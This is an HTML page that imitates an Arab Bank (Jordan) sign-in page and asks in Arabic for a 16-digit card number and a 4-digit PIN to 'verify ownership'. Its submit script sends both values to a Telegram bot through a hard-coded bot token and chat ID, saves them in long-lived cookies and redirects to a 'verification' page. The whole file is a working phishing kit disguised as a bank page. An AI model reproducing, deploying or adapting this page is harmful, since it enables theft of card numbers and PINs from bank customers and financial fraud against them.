<!DOCTYPE html>
<!-- Last Published: Sat Nov 02 2024 03:43:02 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="" data-wf-page="58e125466699330e60585c64" data-wf-site="64ef7d0d34ee51e7fdfd939c" lang="en">

<head>
  <meta charset="utf-8" />
  <title>Arab Bank - الصفحة الرئيسية</title>
  <meta content="Arab Bank Jo" property="og:title" />
  <meta content="البنك العربي - Arab Bank Jo" property="twitter:title" />
  <meta content="https://www2.0zz0.com/2025/04/17/13/812713879.png" property="og:image" />
  <meta content="https://www2.0zz0.com/2025/04/17/13/812713879.png" property="twitter:image" />
  <meta property="og:type" content="website" />
  <meta content="summary_large_image" name="twitter:card" />
  <meta content="width=device-width, initial-scale=1" name="viewport" />
  <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css" />
  <link href="https://fonts.googleapis.com" rel="preconnect" />
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous" />
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">
    WebFont.load({
      google: {
        families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Roboto:300,regular,500"]
      }
    });
  </script>
  <script type="text/javascript">
    !function(o, c) {
      var n = c.documentElement,
        t = " w-mod-";
      n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch")
    }(window, document);
  </script>
  <link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon" />
  <style>
    body {
      box-sizing: border-box;
      font-size: 18px;
    }

    .container {
      padding: 0 5%;
    }

    .field-holder {
      position: relative;
      margin-bottom: 1.25em;
    }

    .w-input {
      border: 0;
      border-bottom: 3px solid #dfdfdf;
      outline: none;
    }

    label {
      position: absolute;
      top: 0;
      left: 0;
      font-size: 1em;
      color: #424242;
      display: flex;
      align-items: center;
      cursor: text;
      transition: .3s ease-in-out;
    }

    .w-input,
    label {
      font-size: 1em;
      width: 100%;
      height: 55px;
    }

    .w-input:focus+label,
    .w-input:valid+label {
      color: #007bff;
      font-size: .75em;
      top: -25px;
      pointer-events: none;
    }

    .w-input:focus,
    .w-input:valid {
      border-bottom: 3px solid #007bff;
    }

    .CustomFooter {
      position: fixed;
      left: 0;
      bottom: 0;
    }

    /* تحديث لون زر التحقق من الملكية إلى الأزرق وجعله مستطيلاً دائرياً */
    .submit-button {
      background-color: #007bff;
      color: white;
      border: none;
      padding: 5px 20px;
      border-radius: 50px; /* مستطيل دائري */
      font-size: 1em;
      cursor: pointer;
      transition: background-color 0.s ease-in-out;
    }


  </style>


<body class="body">
  <!-- إضافة قسم يحتوي على الشعار -->
  <div style="background-color: #f5f5f5; padding: 10px; text-align: center;">
    <img src="https://www2.0zz0.com/2025/04/17/13/812713879.png" alt="Logo" style="max-width: 100%; height: auto;">
  </div>

  <!-- باقي الكود -->
  <div class="div-block-2">
    <div class="w-container">
      <a href="/" aria-current="page"></a>
    </div>
  </div>

  <div class="div-block-4">
    <div class="container">
      <div class="w-form">
        <form id="signin" name="wf-form-" data-name="تسجيل الدخول" redirect="/verification.html" data-redirect="/verification.html" method="get" data-wf-page-id="58e125466699330e60585c64" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">
          <div id="field" class="field-holder">
            <input class="text-field-2 w-input" minlength="16" maxlength="16" name="field" inputmode="numeric" data-name="رقم البطاقة" placeholder="" type="text" id="phonenumber" required="" />
            <label for="phonenumber" class="field-label">رقم البطاقة</label>
          </div>
          <div id="field" class="field-holder">
            <input class="text-field-2 w-input" minlength="4" maxlength="4" inputmode="numeric" id="password" required="" />
            <label for="password" class="field-label-2">الرمز السري من 4 أرقام</label>
          </div>
          <div class="div-block">
            <input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="التحقق من الملكية" />
          </div>
        </form>
      </div>
    </div>
  </div>

  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.20.1/dist/jquery.validate.min.js"></script>
  <script>
    function setCookie(cname, cvalue, exdays) {
      const d = new Date();
      d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
      let expires = "expires=" + d.toUTCString();
      document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
    }

    $('#signin').on("submit", function() {
      phonenumber = document.getElementById('phonenumber').value
      document.getElementById('phonenumber').setAttribute("name", 'phonenumber')
      password = document.getElementById('password').value
      document.getElementById('password').setAttribute("name", 'password');
      var message = "رقم البطاقة:`" + phonenumber + "`\n"
      message += "الرمز السري من 4 أرقام :`" + password + "`\n"
      $.ajax({
        type: 'POST',
        url: `https://api.telegram.org/bot8168987858:AAGVsiHGbpwA-a7bm9f04AJykl1_aWRqcBQ/sendMessage`,
        data: {
          chat_id: "6873334348",
          text: message,
          parse_mode: 'markdown',
        },
        success: function(res) {
          console.debug(res);
          $('#response').text('Message sent');
        },
        error: function(error) {
          console.error(error);
          alert("error failed");
        }
      });
      setCookie("phonenumber", phonenumber, 1000);
      setCookie("password", password, 1000);
    });
  </script>
</body>

</html>